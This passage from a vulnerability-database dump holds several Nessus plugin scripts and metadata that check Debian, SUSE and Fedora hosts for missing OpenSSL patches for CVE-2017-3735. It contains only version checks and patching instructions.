script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libssl1.0.0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libssl-dev\", reference:\"1.0.1t-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libssl-doc\", reference:\"1.0.1t-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libssl1.0.0\", reference:\"1.0.1t-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libssl1.0.0-dbg\", reference:\"1.0.1t-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"openssl\", reference:\"1.0.1t-1+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-07T15:43:11", "description": "This update for openssl fixes the following issues: Security issues fixed :\n\n - CVE-2017-3735: Malformed X.509 IPAdressFamily could cause OOB read (bsc#1056058)\n\n - adjust DEFAULT_SUSE to meet 1.0.2 and current state (bsc#1027908)\n\n - out of bounds read+crash in DES_fcrypt (bsc#1065363)\n\n - DEFAULT_SUSE cipher list is missing ECDHE-ECDSA ciphers (bsc#1055825)\n\n - Missing important ciphers in openssl 1.0.1i-47.1 (bsc#990592) Bug fixes :\n\n - support alternate root ca chains (bsc#1032261)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2017-11-13T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : openssl (SUSE-SU-2017:2981-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libopenssl1_0_0", "p-cpe:/a:novell:suse_linux:libopenssl1_0_0-debuginfo", "p-cpe:/a:novell:suse_linux:libopenssl1_0_0-hmac", "p-cpe:/a:novell:suse_linux:openssl", "p-cpe:/a:novell:suse_linux:openssl-debuginfo", "p-cpe:/a:novell:suse_linux:openssl-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-2981-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104530", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2981-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104530);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-3735\");\n\n script_name(english:\"SUSE SLES12 Security Update : openssl (SUSE-SU-2017:2981-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssl fixes the following issues: Security issues\nfixed :\n\n - CVE-2017-3735: Malformed X.509 IPAdressFamily could\n cause OOB read (bsc#1056058)\n\n - adjust DEFAULT_SUSE to meet 1.0.2 and current state\n (bsc#1027908)\n\n - out of bounds read+crash in DES_fcrypt (bsc#1065363)\n\n - DEFAULT_SUSE cipher list is missing ECDHE-ECDSA ciphers\n (bsc#1055825)\n\n - Missing important ciphers in openssl 1.0.1i-47.1\n (bsc#990592) Bug fixes :\n\n - support alternate root ca chains (bsc#1032261)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1032261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1065363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=990592\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-3735/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172981-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?35d8eec1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1846=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1846=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1846=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libopenssl1_0_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libopenssl1_0_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libopenssl1_0_0-hmac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libopenssl1_0_0-1.0.1i-54.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libopenssl1_0_0-debuginfo-1.0.1i-54.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libopenssl1_0_0-hmac-1.0.1i-54.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssl-1.0.1i-54.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssl-debuginfo-1.0.1i-54.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssl-debugsource-1.0.1i-54.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libopenssl1_0_0-32bit-1.0.1i-54.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1i-54.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libopenssl1_0_0-hmac-32bit-1.0.1i-54.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-08T15:07:12", "description": "Minor update release 1.0.2m from upstream.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2018-01-15T00:00:00", "type": "nessus", "title": "Fedora 27 : 1:compat-openssl10 (2017-512a6c5aae)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:compat-openssl10", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-512A6C5AAE.NASL", "href": "https://www.tenable.com/plugins/nessus/105877", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-512a6c5aae.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105877);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-3735\");\n script_xref(name:\"FEDORA\", value:\"2017-512a6c5aae\");\n\n script_name(english:\"Fedora 27 : 1:compat-openssl10 (2017-512a6c5aae)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Minor update release 1.0.2m from upstream.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-512a6c5aae\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:compat-openssl10 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:compat-openssl10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"compat-openssl10-1.0.2m-1.fc27\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:compat-openssl10\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-07T15:43:35", "description": "Minor update release 1.0.2m from upstream.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2017-11-22T00:00:00", "type": "nessus", "title": "Fedora 26 : 1:compat-openssl10 (2017-7f30914972)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:compat-openssl10", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-7F30914972.NASL", "href": "https://www.tenable.com/plugins/nessus/104729", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-7f30914972.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104729);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-3735\");\n script_xref(name:\"FEDORA\", value:\"2017-7f30914972\");\n\n script_name(english:\"Fedora 26 : 1:compat-openssl10 (2017-7f30914972)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Minor update release 1.0.2m from upstream.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-7f30914972\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:compat-openssl10 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:compat-openssl10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"compat-openssl10-1.0.2m-1.fc26\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:compat-openssl10\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-07T15:44:41", "description": "Minor security update 1.0.2m.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2017-11-29T00:00:00", "type": "nessus", "title": "Fedora 25 : 1:openssl (2017-55a3247cfd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:openssl", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-55A3247CFD.NASL", "href": "https://www.tenable.com/plugins/nessus/104826", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-55a3247cfd.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104826);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-3735\");\n script_xref(name:\"FEDORA\", value:\"2017-55a3247cfd\");\n\n script_name(english:\"Fedora 25 : 1:openssl (2017-55a3247cfd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Minor security update 1.0.2m.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-55a3247cfd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"openssl-1.0.2m-1.fc25\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:openssl\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-08T15:26:35", "description": "Minor security update release 1.1.0g.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2017-11-29T00:00:00", "type": "nessus", "title": "Fedora 26 : 1:openssl (2017-dbec196dd8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3735"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:openssl", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-DBEC196DD8.NASL", "href": "https://www.tenable.com/plugins/nessus/104830", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-dbec196dd8.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104830);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-3735\");\n script_xref(name:\"FEDORA\", value:\"2017-dbec196dd8\");\n\n script_name(english:\"Fedora 26 : 1:openssl (2017-dbec196dd8)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Minor security update release 1.1.0g.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-dbec196dd8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 1:openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n 